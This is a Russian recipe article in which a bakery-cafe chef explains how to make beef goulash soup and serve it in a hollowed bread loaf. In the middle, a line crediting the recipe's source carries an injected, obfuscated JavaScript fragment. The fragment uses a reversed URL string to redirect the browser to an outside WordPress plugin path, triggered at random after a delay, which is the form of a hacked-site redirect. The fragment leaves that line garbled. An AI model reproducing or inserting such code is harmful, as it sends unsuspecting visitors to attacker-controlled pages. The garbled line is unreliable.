Мы попросили Евгения Василенко, шеф-повара сети кафе-пекарен «Хлеб Насущный», поделиться с нами рецептом гуляша из говядины с овощами (а как ещё согреться в такую погоду!) — приготовить его намного проще, чем кажется на первый взгляд.
Евгений Василенко
шеф-повар сети кафе-пекарен «Хлеб Насущный»
— На самом деле в хлебе можно подавать абсолютно любой вид супа. Но есть один нюанс — хлеб может размякнуть и быстро потерять презентабельный вид. Именно поэтому я рекомендую готовить суп-гуляш — он очень густой. Если вы волнуетесь по поводу меню перед встречей гостей, возьмите вчерашний хлеб или подсушите свежий в духовке в течение десяти минут — так он точно будет держать форму.
Фото: nashxleb.ru
Рецепт дня: суп-гуляш из говядины с овощами
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
1,5—2 ЧАС
КОЛИЧЕСТВО ПОРЦИЙ:
2
КАЛОРИЙНОСТЬ:
533 калории
533 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
Говяжья вырезка
2 кг
Морковь
150 г
Лук
150 г
Кабачки
150 г
Баклажаны
150 г
Томаты
150 г
Мука
60 г
Круглая буханка хлеба
2 шт.
Соль
по вкусу
Лавровый лист
по вкусу
Зира
по вкусу
Свежий базилик
по вкусу
Петрушка
по вкусу
Паприка
по вкусу
Перец чёрный молотый
по вкусу
- Перед тем как варить бульон, обжарьте говяжью вырезку в течение двух минут на сильном огне до образования корочки.
- Положите мясо в холодную воду (вам понадобится два литра) и постепенно доведите до кипения. Добавьте соль и лавровый лист. Варите бульон в течение полутора часов.
- В готовый бульон добавьте предварительно обжаренные на растительном масле морковь, лук, баклажаны и цуккини, а также сладкие томаты. При желании вы можете использовать и другие овощи, которые есть в холодильнике.
- Затем добавьте в бульон муку, предварительно пассерованную с водой в пропорции 1:2. Это нужно для того, чтобы суп-гуляш получился более густым.
- Теперь время специй. Не бойтесь экспериментировать и смело используйте свои любимые травы и приправы. В «Хлебе Насущном» добавляют петрушку, укроп, кинзу, соус «Ворчестер», чеснок, базилик, паприку, зиру, различные виды перца, лавровый лист и соль. Такое разнообразие подарит супу не только многогранный вкус, но и потрясающий аромат.
- Срежьте верхушку хлеба и выньте мякиш, оставив стенки толщиной не менее 1,5 см — импровизированный горшочек готов.
- Наливать суп в хлеб нужно непосредственно перед подачей. При желании вы можете украсить готовое блюдо сметаной, зеленью, сушёными грибами и даже сырными гренками.
Ну а если вам не хочется готовить суп дома, попробовать согревающий гуляш вы сможете в одной из кафе-пекарен «Хлеб Насущный».